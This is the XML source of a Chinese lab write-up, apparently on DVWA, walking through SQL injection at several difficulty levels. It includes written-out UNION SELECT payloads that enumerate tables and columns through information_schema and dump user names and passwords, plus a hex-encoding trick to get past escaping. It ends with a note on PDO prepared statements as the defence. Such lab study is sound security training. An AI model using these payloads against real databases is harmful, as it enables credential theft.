    <w:p w14:paraId="5A9B8832" w14:textId="6D29C896" w:rsidR="009C20DF" w:rsidRDefault="009C20DF" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770123D1" w14:textId="7352DC01" w:rsidR="009C20DF" w:rsidRDefault="009C20DF" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCEF891" w14:textId="090AC56E" w:rsidR="009C20DF" w:rsidRDefault="009C20DF" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76AFE640" wp14:editId="73FB4173">
            <wp:extent cx="5274310" cy="18332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3641" w14:textId="608D4FB9" w:rsidR="009C20DF" w:rsidRDefault="009C20DF" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>guestbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71767321" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="6CA68A00" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="11364779" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="171A3DF5" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="58EFF627" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="4251DFF8" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="5028946F" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="24771245" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="59DC9AF6" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="33B01453" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="34F9D269" w14:textId="77777777" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A"/>
    <w:p w14:paraId="28385CE7" w14:textId="68607817" w:rsidR="009C20DF" w:rsidRDefault="00CE6794" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查询字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC03F7" w14:textId="14A9C7CA" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为对</w:t>
      </w:r>
      <w:r w:rsidR="004617CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊符号进行转义了所以我们需要把</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004617CE">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004617CE">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004617CE">
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004617CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转换成16进制来替换执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B0536" w14:textId="6ADB0F3E" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">_concat(column.name) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB314D5" w14:textId="6F09DC16" w:rsidR="00CE6794" w:rsidRPr="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="00CE6794">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6794">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x7573657273</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4B4BB" w14:textId="684D1EF1" w:rsidR="00CE6794" w:rsidRDefault="00CE6794" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16588075" wp14:editId="215830ED">
            <wp:extent cx="5274310" cy="1665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391" w14:textId="36E4852A" w:rsidR="00CE6794" w:rsidRDefault="004617CE" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="004617CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user_id,first_name,last_name,user,password,avatar,last_login,failed_login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC76C22" w14:textId="77777777" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="0052535A"/>
    <w:p w14:paraId="1F18DED3" w14:textId="698C4B7C" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看用户数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4638CCE8" w14:textId="3C82FAC2" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="0052535A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004617CE">
        <w:t>1 union select group_concat(user_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004617CE">
        <w:t>id,first</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004617CE">
        <w:t>_name,last_name),group_concat(user,password) from users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640BA10F" w14:textId="07DACB35" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="0052535A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FC3067C" wp14:editId="4E959B21">
            <wp:extent cx="5274310" cy="8064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7E5B" w14:textId="13693291" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="0052535A"/>
    <w:p w14:paraId="45C59F6B" w14:textId="4981B54C" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="0052535A"/>
    <w:p w14:paraId="1014EDE4" w14:textId="3F384FA7" w:rsidR="004617CE" w:rsidRDefault="004617CE" w:rsidP="004617CE">
      <w:pPr>
        <w:pStyle w:val="1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:High</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E54881E" w14:textId="0B685015" w:rsidR="004F6FBC" w:rsidRDefault="004F6FBC" w:rsidP="004F6FBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79608274" wp14:editId="3FD938E4">
            <wp:extent cx="5274310" cy="20542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F385" w14:textId="021D4079" w:rsidR="004F6FBC" w:rsidRDefault="004E185C" w:rsidP="004F6FBC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t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等级的源码多了L</w:t>
      </w:r>
      <w:r>
        <w:t>IMIT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个的意思是只显示id的第一行信息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这个时候用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or 1=1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来显示更多的信息，还有</w:t>
      </w:r>
      <w:r w:rsidRPr="004E185C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查询提交页面与查询结果显示页面不是同一个，也没有执行302跳转，这样做的目的是为了防止一般的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E185C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E185C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注入，因为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E185C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E185C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注入过程中，无法在查</w:t>
      </w:r>
      <w:r w:rsidRPr="004E185C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>询提交页面上获取查询的结果，没有了反馈，也就没办法进一步注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13235F83" w14:textId="373F1EA6" w:rsidR="004E185C" w:rsidRDefault="004E185C" w:rsidP="004F6F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因为注入过程和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>low等级的都大同小异就直接放上查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B87A518" w14:textId="518C9777" w:rsidR="004E185C" w:rsidRDefault="004E185C" w:rsidP="004F6FBC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552E6CE" wp14:editId="5C194C2F">
            <wp:extent cx="5274310" cy="18389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9BC1" w14:textId="3463E77B" w:rsidR="004E185C" w:rsidRDefault="004E185C" w:rsidP="004F6FBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B425E2" w14:textId="03FACD93" w:rsidR="004E185C" w:rsidRDefault="004E185C" w:rsidP="004E185C">
      <w:pPr>
        <w:pStyle w:val="1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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>evel:Impossible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47AD3A2C" w14:textId="0312A525" w:rsidR="004E185C" w:rsidRDefault="004E185C" w:rsidP="004E185C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C39C9E" wp14:editId="18B2166A">
            <wp:extent cx="5274310" cy="24022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3E9A" w14:textId="23254F15" w:rsidR="004E185C" w:rsidRPr="004E185C" w:rsidRDefault="004E185C" w:rsidP="004E185C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E185C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以看到，Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，同时只有返回的查询结果数量为一时，才会成功输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC87343" w14:textId="77777777" w:rsidR="004E185C" w:rsidRPr="004E185C" w:rsidRDefault="004E185C" w:rsidP="004E185C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2193B0CB" w14:textId="77777777" w:rsidR="004617CE" w:rsidRPr="004E185C" w:rsidRDefault="004617CE" w:rsidP="004617CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004617CE" w:rsidRPr="004E18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E51D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C0EE15C"/>
    <w:lvl w:ilvl="0" w:tplc="684CC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A"/>
    <w:rsid w:val="0002394A"/>
    <w:rsid w:val="00121E73"/>
    <w:rsid w:val="0039622B"/>
    <w:rsid w:val="004617CE"/>
    <w:rsid w:val="004E185C"/>
    <w:rsid w:val="004F6FBC"/>
    <w:rsid w:val="004F7F19"/>
    <w:rsid w:val="0052535A"/>
    <w:rsid w:val="00992F4C"/>
    <w:rsid w:val="009C20DF"/>
    <w:rsid w:val="00A22E51"/>
    <w:rsid w:val="00B55F94"/>
    <w:rsid w:val="00C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1BDB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{09A82F03-23A3-47F6-8DF5-F089B801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E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E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1E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E73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121E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21E73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121E73"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00121E7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21E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E67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679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25B9-E972-4B07-A2FB-9D57CB8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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-30T06:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-30T10:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>